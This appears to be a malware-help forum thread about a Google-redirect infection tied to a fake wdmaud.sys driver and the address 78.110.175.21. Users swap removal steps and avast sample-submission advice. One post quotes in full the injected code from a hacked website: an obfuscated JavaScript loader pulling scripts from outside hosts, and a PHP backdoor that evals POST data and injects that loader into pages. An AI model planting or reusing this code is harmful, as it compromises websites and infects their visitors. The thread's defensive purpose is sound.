Blocked 78.110.175.21 and bogus google links

[DavidR]

Anyone with a copy of this file should submit it to avast.

Send the sample to virus@avast.com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.

Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that. Send it from the User Files section of the chest (select the file, right click, email to Alwil Software).

This process has been modified in the latest version to make it easier, it doesn't actually get emailed, but transferred when the next avast auto (or manual) update is done.

[entulsar]

I GOT THIS IN VISTA BUT ONLY WHEN I TRY TO LOG ONTO A GAME CALLED GRUDGE MU,NOW I GO HUNTING  HEHE

[spg SCOTT]

Yes!  I had the wrong folder!  Deleting c:\windows\system32\drivers\wdmaud.sys worked perfectly!  Thanks Nobody71!

Isn't that the one you said previously didn't work?

Deleting wdmaud.sys from the drivers folder didn't fix my problem (exact symptoms as everybody else with 7.7.7.0 and 78.110.175.21) .  BTW as soon as I delete the file, another one pops back up in that folder.

is that the one you deleted or did you delete the one in the system32 folder, I'm confused

[bahog]

Nobody71,

Renamed wdmaud.sys file, put copy into chest, deleted system 32 file. Google search has no redirection and no more two minute warning.

Love your work

Many thanks.

bahog

[bahog]

Anyone with a copy of this file should submit it to avast.
Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there.

Consider this done.

Bahog

[DavidR]

Thanks for helping improve detections.

Welcome to the forums.

[Aokin]

Thanks Nobody71

[ozwally]

I put that file in the virus chest first, but this alone didn't prevent the problem. Is it supposed to?
(I didn't restart though)

Renaming it solved all of my symptoms (Javascript is back on with no problems).

Thanks everyone for your help.

[DavidR]

Moving it to the chest (after a detection) would achieve the same as renaming it (the file essentially isn't there, not in the original name or if moved the the chest). Hhowever, if you manually send a copy to the chest then there will still be a copy in the original location as my previous post mentioned.

Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that. Send it from the User Files section of the chest (select the file, right click, email to Alwil Software).

I have highlighted the relevant bit, you probably missed that buried amongst all the other info.

[ras]

I had the same Blocked message popping up. It started after my website has been hacked.   It is due to hacked html files or php files where the hacker inserted the following codes when you view the page source:

<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('@/|%2F%3C|%64%69%76&%20$%73$%74%79@%6C@e$%3D%64%69%73%70%6C&%61y$%3A~n#%6F~n~e$%3E\n!%64$%6F%63&%75`me%6E%74|.@%77~r#%69`t`%65(~"#%3C#/t!%65xt~a%72`%65@%61$%3E%22%29$%3B%76%61%72`%20%69`%2C_%2C%61&%3D[`"!7%38#%2E&110~%2E$%31`%375!%2E2|1#"@%2C#%22$%31%39%35%2E%32~%34.~7%36&%2E!2|5%31"|%5D~;!_@=1`;i%66$%28%64%6F|c&%75m|e%6Et#.c#o|%6F%6Bie`.%6D|a%74c!h~%28$%2F&%5C@b@h%67|%66t|%3D~%31|/%29`%3D%3D`%6E!%75~%6C#l)%66&o~%72|(@i%3D0%3B%69%3C@2|%3B%69&%2B%2B@)|%64$%6F%63&%75%6De%6E$%74%2E&%77ri#%74%65!(#"@%3C%73%63%72!i!p$%74$%3E%69@f$%28%5F%29%64$%6F%63$%75%6D%65%6E#t%2E%77%72&i!te`(|%5C"#%3Cs#c@r`i$%70%74!%20|i&%64=%5F|%22!+i%2B@"%5F$%20%73!%72`c=/%2F$%22@+#a%5Bi]%2B&"%2F@%63%70%2F|?"%2B%6E|%61%76i%67a@%74or%2E&a%70p~%4E&%61m|e.!c`%68%61&%72`%41#t|%28$%30`%29!+"`%3E|%3C~%5C%5C/s%63#r%69&%70t%3E%5C")%3C#%5C/!%73cr#ip~t%3E%22%29;\n/%2F&%3C|%2Fd#i%76%3E').replace(/\||@|\$|~|\!|#|\&|`/g,""));var yahoo_counter=1;
<!-- counter end --></script>

OR FOR PHP

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCdAL3wlMkYlM0N8JTY0JTY5JTc2JiUyMCQlNzMkJTc0JTc5QCU2Q0BlJCUzRCU2NCU2OSU3MyU3MCU2QyYlNjF5JCUzQX5uIyU2Rn5ufmUkJTNFXG4hJTY0JCU2RiU2MyYlNzVgbWUlNkUlNzR8LkAlNzd+ciMlNjlgdGAlNjUofiIjJTNDIy90ISU2NXh0fmElNzJgJTY1QCU2MSQlM0UlMjIlMjkkJTNCJTc2JTYxJTcyYCUyMCU2OWAlMkNfJTJDJTYxJiUzRFtgIiE3JTM4IyUyRSYxMTB+JTJFJCUzMWAlMzc1ISUyRTJ8MSMiQCUyQyMlMjIkJTMxJTM5JTM1JTJFJTMyfiUzNC5+NyUzNiYlMkUhMnw1JTMxInwlNUR+OyFfQD0xYDtpJTY2JCUyOCU2NCU2RnxjJiU3NW18ZSU2RXQjLmMjb3wlNkYlNkJpZWAuJTZEfGElNzRjIWh+JTI4JCUyRiYlNUNAYkBoJTY3fCU2NnR8JTNEfiUzMXwvJTI5YCUzRCUzRGAlNkUhJTc1fiU2QyNsKSU2NiZvfiU3MnwoQGklM0QwJTNCJTY5JTNDQDJ8JTNCJTY5JiUyQiUyQkApfCU2NCQlNkYlNjMmJTc1JTZEZSU2RSQlNzQlMkUmJTc3cmkjJTc0JTY1ISgjIkAlM0MlNzMlNjMlNzIhaSFwJCU3NCQlM0UlNjlAZiQlMjglNUYlMjklNjQkJTZGJTYzJCU3NSU2RCU2NSU2RSN0JTJFJTc3JTcyJmkhdGVgKHwlNUMiIyUzQ3MjY0ByYGkkJTcwJTc0ISUyMHxpJiU2ND0lNUZ8JTIyIStpJTJCQCIlNUYkJTIwJTczISU3MmBjPS8lMkYkJTIyQCsjYSU1QmldJTJCJiIlMkZAJTYzJTcwJTJGfD8iJTJCJTZFfCU2MSU3NmklNjdhQCU3NG9yJTJFJmElNzBwfiU0RSYlNjFtfGUuIWNgJTY4JTYxJiU3MmAlNDEjdHwlMjgkJTMwYCUyOSErImAlM0V8JTNDfiU1QyU1Qy9zJTYzI3IlNjkmJTcwdCUzRSU1QyIpJTNDIyU1Qy8hJTczY3IjaXB+dCUzRSUyMiUyOTtcbi8lMkYmJTNDfCUyRmQjaSU3NiUzRScpLnJlcGxhY2UoL1x8fEB8XCR8fnxcIXwjfFwmfGAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

I am still in the process of cleaning these unwanted codes on my web files.

If any still encounters the same problem, try checking the page source of the website you are currently browsing and see if there are suspect codes in it.

[klal]

Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem.  Wish I  had read this a bit earlier and saved myself some agony.

[REDACTED]

Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem.  Wish I  had read this a bit earlier and saved myself some agony.

What solution is highlighted? Where? I'm new here so please excuse my ignorance.

[randelfi]

I found several references online to various malware hiding as a legitimate Windows driver, wdmaud.sys, which is an audio-related driver.  There should only be two files with this name in the following two locations:

C:\WINDOWS\SYSTEM32\wdmaud.drv
and
C:\WINDOWS\SYSTEM32\DRIVERS\wdmaud.sys

In my case, there was a bogus "wdmaud.sys" in the SYSTEM32 folder (not the \DRIVERS subfolder).  I did the following:
1. Rename all *wdmaud*.* files to "zzz_wdmaud.*.
2. Run the Windows system file comparator from the Command Window as sfc /SCANNOW.  This restores the correct wdmaud files.
3. Once everything is running again, delete the renamed files.

This appears to have ended the "blocked access to infected site 78.110.175.21" message for me. 

By the way, I ran Avast!, SpywareDoctor, CounterSpy and CCleaner (to elminate old junk) and none of these detected anything!

Richard

[spydier]

This also worked for me as an apparent instant fix to delete the file

seems a little too easy once you get the right file haha

Many thanks to the finder nobody71

phil i suggest reading the thread from page one, it wont take long and if you have the bug in question it appears this is the fix

[klal]

Hi Phil,

The solution refers to the moving of the file wdmaud.sys that you will most likely find in the c:\windows\system32 directory to the quarantine area (using Avast!)

Here's the link to the post: http://forum.avast.com/index.php?topic=41423.msg347589#msg347589

Cheers,
Lal

Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem.  Wish I  had read this a bit earlier and saved myself some agony.

What solution is highlighted? Where? I'm new here so please excuse my ignorance.